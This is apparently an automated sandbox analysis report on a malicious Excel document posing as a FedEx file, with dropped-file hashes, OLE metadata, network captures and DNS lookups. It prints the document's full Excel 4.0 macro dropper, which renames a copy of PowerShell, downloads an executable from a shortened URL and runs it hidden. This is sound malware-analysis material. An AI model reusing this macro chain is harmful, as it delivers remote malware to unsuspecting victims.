Preview:	0..S....H.........S.0..S....1.0...`.H.e......0..C...+.....7.....C.0..C.0...+.....7.............201012214904Z0...+......0..C.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\powershell.exe Download File
Process:	C:\Windows\System32\Robocopy.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	473600
Entropy (8bit):	5.856226346360318
Encrypted:	false
SSDEEP:	6144:dxGRyCXBgoDhzoNKXzJ7BapCK5d3klRzULOnWyjLsPhAQzqO:CRZgQhIKXzJ4pdd3klnnWosPhnzq
MD5:	852D67A27E454BD389FA7F02A8CBE23F
SHA1:	5330FEDAD485E0E4C23B2ABE1075A1F984FDE9FC
SHA-256:	A8FDBA9DF15E41B6F5C69C79F66A26A9D48E174F9E7018A371600B866867DAB8
SHA-512:	327DC74590F34185735502E289135491092A453F7F1C5EE9E588032FF68934056FFA797F28181267FD9670F7895E1350894B16EA7B0E34A190597F14AEA09A4D
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T.r.5.!.5.!.5.!...!.5.!.M6!.5.!.M'!.5.!.M0!.5.!.5.! 5.!.M !.5.!.M)!.5.!...!.5.!.M7!.5.!.M2!.5.!Rich.5.!........................PE..d.....[J.........."..........b......<..........@.............................p............@.......... ...................................................A......D............`..P.......................................................X............................text............................... ..`.data...x...........................@....pdata..D...........................@..@.rsrc....A.......B..................@..@.reloc.......`......................@..Bk.[JX.....[Je.....[Jr...+.[J}...p.[J......[J......[J............Y.[J......[J............ADVAPI32.dll.KERNEL32.dll.msvcrt.dll.NTDLL.DLL.ATL.DLL.ole32.dll.OLEAUT32.dll.mscoree.dll.SHLWAPI.dll.USER32.dll................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\1099008FEDEX_090887766.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:20 2020, mtime=Thu Nov 19 16:19:49 2020, atime=Thu Nov 19 16:19:49 2020, length=76288, window=hide
Category:	dropped
Size (bytes):	2148
Entropy (8bit):	4.481151251117272
Encrypted:	false
SSDEEP:	48:8DS/XT0ZVXd2zIS3cQh2DS/XT0ZVXd2zIS3cQ/:8DS/XuVXYzB3cQh2DS/XuVXYzB3cQ/
MD5:	6190CA1A085A8A15EDDE5FB9EDDE6A2E
SHA1:	CAF57B17A022A5E66B5F912CABE043A5B2770FD8
SHA-256:	AA260EA283DD9B68C8CED05A286555EC4B17287D3214538C299FD831AFC11889
SHA-512:	D1AA19FE4E53B810145064079E002139500AD5D0B85E67275A2BFCEF55D340188D0266E744748F0C53805BC72E04406698ED1BB11CE14BD9ACCF94AC7046A2CC
Malicious:	false
Preview:	L..................F.... ......{...%./....../................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....~.2.....sQv. .109900~1.XLS..b.......Q.y.Q.y*...8.....................1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop\1099008FEDEX_090887766.xls.1.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.1.0.9.9.0.0.8.F.E.D.E.X._.0.9.0.8.8.7.7.6.6...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Thu Nov 19 16:19:49 2020, atime=Thu Nov 19 16:19:49 2020, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.469060712960536
Encrypted:	false
SSDEEP:	12:85Qg/CLgXg/XAlCPCHaXEKB8VXB/tkgUX+Wnicvb4+bDtZ3YilMMEpxRljKFTdJU:85X/U/XT0K6VXbUYelDv3qcrNru/
MD5:	2430C91467EC57616E6AA337EE9C15B3
SHA1:	D8226654098FB70B81C498FC4A1910929280A36C
SHA-256:	5F25AD086319C936CBE316C6531E45C1F2CBE0602FD54A88B89FDC0EE8E2C6A2
SHA-512:	1DA6164C7FDD52AA37F71F3AE004E4D217BAE96048F1E2B2420AE4C0CC12B27FB96B2BA0610C13D0A6051E0B5BC9B359CC757AE19FF515DACA494C49636594AE
Malicious:	false
Preview:	L..................F...........7G..+I./....+I./..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1.....sQy...Desktop.d......QK.XsQy...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\468325\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......468325..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	119
Entropy (8bit):	4.415048138821879
Encrypted:	false
SSDEEP:	3:oyBVomMMRVGSjBVoiVGSjBVomMMRVGSjBVov:dj6i0Sjjx0Sjj6i0Sjjy
MD5:	34385654C9E82057BA049CF65C0BBFD8
SHA1:	59CFD55557D1BF3D3AAAE6B3B2AFBCC2F7A6DA07
SHA-256:	A784CD559952876D7779B8575FE611445A1C28ACE60D19D84A942A7321C6423A
SHA-512:	ECA1095B0975C45EAB0F72F17AF61CA29C8A8B85BC0DE19371346E53A77D3ACA657DB1B130425694EAF4D0A42F4B60B47F5F056CEA5D88374C6AAACB0D371CF9
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..1099008FEDEX_090887766.LNK=0..1099008FEDEX_090887766.LNK=0..[xls]..1099008FEDEX_090887766.LNK=0..

C:\Users\user\Desktop\3BFE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Applesoft BASIC program data, first line number 16
Category:	dropped
Size (bytes):	100924
Entropy (8bit):	6.290226915225571
Encrypted:	false
SSDEEP:	3072:Awk3hbdlylKsgqopeJBWhZFGkE+cL2Ndcb4dEEwrTxoLwk3hbdlylKsgqopeJBWe:Fk3hbdlylKsgqopeJBWhZFVE+W2NdcbP
MD5:	59428FE348674F3B2E93393B393A981B
SHA1:	01A580E8966B43094D8746FC282EA54C90FDB9FD
SHA-256:	14BAD88B85DB7E727A5952E39C3054EAD1F27620E758B1A38020C19E19A04304
SHA-512:	47C91CE7760785E212524979E8D5FCBB987A2F22C6CFAE98308BF80F0E500E3BAED5760DE57568DDA3BAC7F2548CC5811A2456AA9BCB88B51511FC170D51A334
Malicious:	false
Preview:	........g2..........................\.p....user B.....a.........=...........................................=...h...\:.#8.......X.@...........".......................1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................A.r.i.a.l.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.*.h...6...........C.a.l.i.b.r.i. .L.i.g.h.t.1...,...6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.i.1.......6...........C.a.l.i.b.r.

C:\Users\user\Documents\vc.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\o.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	modified
Size (bytes):	160312
Entropy (8bit):	7.6582344259708695
Encrypted:	false
SSDEEP:	3072:XYhVzakz10URbezAqQF2XcPmSsu/SmwhZ7jL/qz8/kLAQkR5K:iVVRbezcoXeT/wL7jLixzUK
MD5:	BB7C0DFD8ECC7EEBCE937A232608695F
SHA1:	1CCC1FB00E7550C3E0A531E2C0516B741BD26F77
SHA-256:	BE901CFEF8FFF5E7E61DEBEB870EB86D93E84CD458E34D661BC7B0C1103D93BF
SHA-512:	DF6F2AAB574B766CD9AC6FEA092DF79E667B731C8C4CAC34127294C7EBD50CCC9E66F0ECDDBEA0B5BC9A4BCD1999035484C8A30259948AE08BC76B9BB2B23EC3
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.._.................H...........f... ........@.. ....................................@..................................f..J....................T..8............................................................ ............... ..H............text....F... ...H.................. ..`.rsrc................J..............@..@.reloc...............R..............@..B.................f......H...........T>......@....+...:..........................................N+.+.(....+.(....+.6.(.....(......>+.+..+.(....+..0..]........,+)+.,..,+&++,. .f.+%+.-.+,&.,.+-{....+).+.(....+..+..+.(U...+.(....+.(....+..+.o....+.....0..v........-.+:.+>,. ..f.+<+A&.-.+A+B .f.+B .....+A+B.o....}.....-..-.(....+.(....+.(U...+.(....+..+.(....+.(U...+..+.(....+....0..I........-.+',.+&{....,.+ {....+..,..,.+.+..,.&&.-..+..+..+.o....+..+..+.(....+.....~......+.......+...(....*

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Last Saved By: Alexis UZAN, Create Time/Date: Sun Sep 20 22:17:44 2020, Last Saved Time/Date: Sun Oct 11 00:50:35 2020, Security: 1
Entropy (8bit):	6.7883643858765215
TrID:	Microsoft Excel sheet (30009/1) 78.94% Generic OLE2 / Multistream Compound File (8008/1) 21.06%
File name:	1099008FEDEX_090887766.xls
File size:	68608
MD5:	069451376c805d4b4d21fdc34a5e58ba
SHA1:	5e8897fa3ee53ac8a1f010e01ea4ec5c2b3dbed5
SHA256:	dc2be755822676a5ec7e406876c100efaf4983272e57a52469d5f0f788f55b82
SHA512:	b05d54fb806cfa391e78871328659319824481dcf522a8a1a18067c6c702460fb8650dd603f8d91e1123ef9836406c2fdddc48f38048c8ca1da6a77983f750ec
SSDEEP:	1536:eknSGiysRchNXHfA1MiWhZFGkEld+Dr7e7mSb4wIE7zp0RhBv1hQz7rT01R:eknSGiysRchNXHfA1MiWhZFGkEld+Drj
File Content Preview:	........................;......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea286a4b4bcb4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "1099008FEDEX_090887766.xls"

Indicators
Has Summary Info:	True
Application Name:	unknown
Encrypted Document:	False
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Last Saved By:	Alexis UZAN
Create Time:	2020-09-20 21:17:44
Last Saved Time:	2020-10-10 23:50:35
Security:	1

Document Summary
Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	1048576

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 276

General
Stream Path:	\x5DocumentSummaryInformation
File Type:	data
Stream Size:	276
Entropy:	3.16930549839
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . . . F e u i l l e s d e c a l c u l . . . . . . . . . . . . . . . . . M a c r o
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 98 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 156

General
Stream Path:	\x5SummaryInformation
File Type:	data
Stream Size:	156
Entropy:	3.42617386685
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . l . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . L . . . . . . . X . . . . . . . d . . . . . . . . . . . . . . . . . . . A l e x i s U Z A N . @ . . . . L . z . . . . @ . . . . . . % ` . . . . . . . . . . .
Data Raw:	fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 6c 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 4c 00 00 00 0d 00 00 00 58 00 00 00 13 00 00 00 64 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0c 00 00 00 41 6c 65 78 69 73 20 55 5a 41 4e 00 40 00 00 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 65416

General
Stream Path:	Workbook
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	65416
Entropy:	6.88571621138
Base64 Encoded:	True
Data ASCII:	. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . H P - P C s U Z A N B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . h . . . \\ : . # 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 48 50 2d 50 43 73 20 55 5a 41 4e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Macro 4.0 Code

"=EXEC(""cmd.exe /c robocopy %windir%\system32\WindowsPowerShell\v1.0\ %temp% powershell.exe /mt /z & exit"")""=EXEC(""cmd /c timeout /t 1 & cd %temp% & ren powershell.exe o.exe & exit"")""=EXEC(""cmd /c %temp%\o.exe -w 1 cd $env:temp; Start-Sleep 3; (get-item o.exe).Attributes += 'Hidden'"")""=WAIT(NOW()+""00:00:03"")""=EXEC(""cmd /c %temp%\o.exe -w 1 (New-Object Net.WebClient).DownloadFile(('htt'+'ps://tinyurl.com/y3m5fwhq'),'vc.exe')"")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 7; Move-Item """"vc.exe"""" -Destination """"$env:appdata"""""")""=EXEC(""cmd /c %temp%\o.exe -w 1 Start-Sleep 12; cd $env:appdata; ./vc.exe;"")"=PAUSE()

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:20:04.349455118 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.365885973 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.365977049 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.393526077 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.410087109 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.412194014 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.412219048 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.412228107 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.412317991 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.422568083 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.438942909 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.439007998 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.651473045 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.659184933 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:04.659360886 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.979670048 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:04.996330023 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:05.479132891 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:05.479159117 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:05.479166985 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:05.479177952 CET	443	49167	104.20.138.65	192.168.2.22
Nov 19, 2020 09:20:05.479291916 CET	49167	443	192.168.2.22	104.20.138.65
Nov 19, 2020 09:20:05.520050049 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.532464027 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.532542944 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.533108950 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.548305035 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.551703930 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.551729918 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.551747084 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.551785946 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.551822901 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.551867962 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.559779882 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:05.572036028 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.572272062 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:05.774715900 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.289109945 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.301779985 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594652891 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594680071 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594693899 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594707012 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594741106 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594742060 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.594754934 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594769955 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.594788074 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.594894886 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594907999 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.594938040 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595014095 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595029116 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595043898 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595055103 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595077991 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595105886 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595140934 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595159054 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595185995 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595251083 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595267057 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595294952 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595364094 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595377922 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595407009 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595441103 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595490932 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595519066 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595530033 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595547915 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595571041 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595601082 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595601082 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595614910 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595629930 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595643044 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595644951 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595664978 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595671892 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595681906 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595698118 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595710993 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595711946 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595742941 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595789909 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595796108 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595856905 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595879078 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595886946 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595937014 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595959902 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595966101 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.595984936 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.595999002 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.596016884 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.596064091 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.596079111 CET	443	49168	162.159.134.233	192.168.2.22
Nov 19, 2020 09:20:07.596093893 CET	49168	443	192.168.2.22	162.159.134.233
Nov 19, 2020 09:20:07.596137047 CET	443	49168	162.159.134.233	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 19, 2020 09:20:04.302839041 CET	52197	53	192.168.2.22	8.8.8.8
Nov 19, 2020 09:20:04.317117929 CET	53	52197	8.8.8.8	192.168.2.22
Nov 19, 2020 09:20:05.506973982 CET	53099	53	192.168.2.22	8.8.8.8
Nov 19, 2020 09:20:05.518925905 CET	53	53099	8.8.8.8	192.168.2.22
Nov 19, 2020 09:20:05.901844025 CET	52838	53	192.168.2.22	8.8.8.8
Nov 19, 2020 09:20:05.920768023 CET	53	52838	8.8.8.8	192.168.2.22
Nov 19, 2020 09:20:06.258945942 CET	61200	53	192.168.2.22	8.8.8.8
Nov 19, 2020 09:20:06.277167082 CET	53	61200	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 19, 2020 09:20:04.302839041 CET	192.168.2.22	8.8.8.8	0x92f1	Standard query (0)	tinyurl.com	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.506973982 CET	192.168.2.22	8.8.8.8	0x7885	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Nov 19, 2020 09:20:04.317117929 CET	8.8.8.8	192.168.2.22	0x92f1	No error (0)	tinyurl.com	104.20.138.65	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:04.317117929 CET	8.8.8.8	192.168.2.22	0x92f1	No error (0)	tinyurl.com	172.67.1.225	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:04.317117929 CET	8.8.8.8	192.168.2.22	0x92f1	No error (0)	tinyurl.com	104.20.139.65	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.518925905 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cdn.discordapp.com	162.159.134.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.518925905 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cdn.discordapp.com	162.159.129.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.518925905 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cdn.discordapp.com	162.159.133.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.518925905 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cdn.discordapp.com	162.159.130.233	A (IP address)	IN (0x0001)
Nov 19, 2020 09:20:05.518925905 CET	8.8.8.8	192.168.2.22	0x7885	No error (0)	cdn.discordapp.com	162.159.135.233	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
